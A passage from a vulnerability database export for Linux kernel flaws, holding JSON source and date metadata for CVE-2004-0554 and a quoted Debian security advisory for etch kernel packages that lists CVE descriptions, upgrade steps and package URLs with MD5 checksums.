        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "db": "BID",
        "id": "10538"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "db": "BID",
        "id": "10538"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-06-15T00:00:00",
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "date": "2004-08-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "date": "2004-06-14T00:00:00",
        "db": "BID",
        "id": "10538"
      },
      {
        "date": "2004-06-18T00:00:00",
        "db": "BID",
        "id": "10566"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "date": "2006-05-22T06:29:12",
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "date": "2006-05-22T06:33:40",
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "date": "2006-05-22T06:34:27",
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "date": "2004-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "date": "2004-08-06T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-08-23T00:00:00",
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "date": "2010-08-05T19:46:00",
        "db": "BID",
        "id": "10538"
      },
      {
        "date": "2007-01-17T21:30:00",
        "db": "BID",
        "id": "10566"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "date": "2017-10-11T01:29:28.200000",
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "10538"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Multiple Device Driver Vulnerabilities",
    "sources": [
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      }
    ],
    "trust": 0.9
  }
}

var-200906-0605
Vulnerability from variot

drivers/net/e1000e/netdev.c in the e1000e driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to have an unspecified impact via crafted packets, a related issue to CVE-2009-4537. The Linux e1000e driver is prone to a security-bypass vulnerability. An attacker can exploit this issue to cause network traffic to be misinterpreted, which may allow the attacker to bypass intended security restrictions or launch further attacks. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. Although security support for 'etch' officially ended on Feburary 15th, 2010, this update was already in preparation before that date.

Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service, sensitive memory leak or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-2691

Steve Beattie and Kees Cook reported an information leak in the
maps and smaps files available under /proc. Local users may be
able to read this data for setuid processes while the ELF binary
is being loaded.

CVE-2009-2695

Eric Paris provided several fixes to increase the protection
provided by the mmap_min_addr tunable against NULL pointer
dereference vulnerabilities.

CVE-2009-3080

Dave Jones reported an issue in the gdth SCSI driver. A missing
check for negative offsets in an ioctl call could be exploited by
local users to create a denial of service or potentially gain
elevated privileges.

CVE-2009-3726

Trond Myklebust reported an issue where a malicious NFS server
could cause a denial of service condition on its clients by
returning incorrect attributes during an open call.

CVE-2009-3889

Joe Malicki discovered an issue in the megaraid_sas driver. 
Insufficient permissions on the sysfs dbg_lvl interface allow
local users to modify the debug logging behavior.

CVE-2009-4005

Roel Kluin discovered an issue in the hfc_usb driver, an ISDN
driver for Colognechip HFC-S USB chip.

CVE-2009-4020

Amerigo Wang discovered an issue in the HFS filesystem that would
allow a denial of service by a local user who has sufficient
privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem. If the
system is sufficiently low on memory, a local user can cause the
kernel to dereference an invalid pointer resulting in a denial of
service (oops) and potentially an escalation of privileges.

CVE-2009-4138

Jay Fenlason discovered an issue in the firewire stack that allows
local users to cause a denial of service (oops or crash) by making
a specially crafted ioctl call.

CVE-2009-4308

Ted Ts'o discovered an issue in the ext4 filesystem that allows
local users to cause a denial of service (NULL pointer
dereference).

CVE-2009-4536 & CVE-2009-4538

Fabian Yamaguchi reported issues in the e1000 and e1000e drivers
for Intel gigabit network adapters which allow remote users to
bypass packet filters using specially crafted Ethernet frames. This option is disabled by
default.

CVE-2010-0007

Florian Westphal reported a lack of capability checking in the
ebtables netfilter subsystem. If the ebtables module is loaded,
local users can add and modify ebtables rules.

CVE-2010-0410

 Sebastian Krahmer discovered an issue in the netlink connector
 subsystem that permits local users to allocate large amounts of
 system memory resulting in a denial of service (out of memory).

CVE-2010-0415

Ramon de Carvalho Valle discovered an issue in the sys_move_pages
interface, limited to amd64, ia64 and powerpc64 flavors in Debian. 
Local users can exploit this issue to cause a denial of service
(system crash) or gain access to sensitive kernel memory.

CVE-2010-0622

Jermome Marchand reported an issue in the futex subsystem that
allows a local user to force an invalid futex state which results
in a denial of service (oops).

For the oldstable distribution (etch), this problem has been fixed in version 2.6.24-6~etchnhalf.9etch3.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc Size/MD5 checksum: 5118 e05bb21e7655cbfa39aed8d4fd6842eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz Size/MD5 checksum: 4099250 127bad8d653046d37fc52115d4e3a332 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 4263554 6c56ff077d17eba766af47544ce0f414 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 83890 62cfd18ed176359831502e70d80b291a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1550090 1f114fdc3123f135017dbdcd0e4839c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1009878 c7b7abff092940a400703b9168e46daa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 98248 a2a391008f8855d8358d5f18d9d76044

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329786 a212d2b3a94f8a04611c0f20d3d324b9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83428 f5f27b9de4905239e6315c77393f1f03 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83454 5d152b5b6aa505982ebc7122a770b29b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 3455268 da2d2cc2b7c4253ac408c30fcfddb28f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329788 f589f8815f7adf02f8884e2dd3ac613f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329336 14bf085655b30adc8ab8f6ed4207d415

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 3656476 f2f5de65037664d03208fcea83bf2ee2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83422 600c7216143f43f9c61b0c2ccd118ea0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83434 36f1d8f21ec39a473536dbeda2332e62 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 346940 d3f12fdd61f90749fdd08d857b326327

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 9357734 3e1165a0795d7db5f7ed8ef84205064b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 298744 50d8bfa3c06134e190409399a36c5aa9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83546 1742ab93afadd1827009bf1d714e76eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83578 07906e33f9ad267d986991c93eef1048 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 308138 34dbc7720b1844833f0b71aa307c37fa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 310714 6a2c6fbbc1dd000b8a532227e3b8b5ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 3939512 91c2ba626e754fe407d6dcf3fa01337a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 259624 ac09dcabb624984b7321a5f6b6dbef54 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83578 e152e18748e5c80b6d06715db836cf83 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 260838 44bc8ad5796c124b53d85a8c3a4ed912 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 262420 ff0641f04c409dd606c34373e8e16269 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83546 990eb24056c7f6a63a4d55ec39563bae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 3446386 6ebfa4544252648df48cfb085cc3d2cc http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 258962 75184bed1f0b42cd8e002f93ed42198a

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 3656680 c5499cb98cdcdcadc48e3aa5bdf1d379 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 346982 6a6a08f74f9690705e6d770d1f3f2566 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 359548 b10fe011746b0df5fbd2587292af34ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83452 32a1614212e964a4423b161b34cd758d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358212 58ba32b0701643f043ab38a487cae609 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83424 c1e8493aff96df5b0fe33f5af4686f98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358752 4e3e9ef18a14fd191444591df571f80c

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 3569470 9ae824064bfc785f4b3512db78119e46 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83432 64a48fa9283b1741e22f0a22dbb93b20 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83456 235a5572d5e109a4b575080a8262dc57 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 319938 d7dc0120458e93119879dcdd1e48017e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 320226 34731a37b519d726b133093e04d937c3

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248638 ce9da5c377d6328e9bb9be1c3945fff8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83600 a7b66d71779dea207a3d49cb9f692fdb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 313302 314b57dc807eb91f617c10b1497e1617 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 314602 2c127076bf189be2836a4c3a4c7736af http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83540 8acdb1b4a4bc57f55b9cc5b2b04043a4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 229412 0b93c7c909eca04fad4fa45e3e73e96c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248700 13266a2acd5fcbd75d11049dd5e5ad58 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 218314 4174dec1c73ca114469cbb88fba32926

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 309868 d69b27ef946f2ac62b115e0200fe8002 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248150 7c585f74e0752a631050b13b9740c0c3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83484 a678208f18017a9c87d45548916fd98e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 311392 5b1f0957a2756b04be6c95ae8ca5e2c8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 247968 929ca712a0aa0984f9dc2a6f68f405a5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 3805532 be10a8b64da3adf7ece3846b0b0bf930 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83434 ac0cb9b5939e4ea82c3c83a1a1d473ed 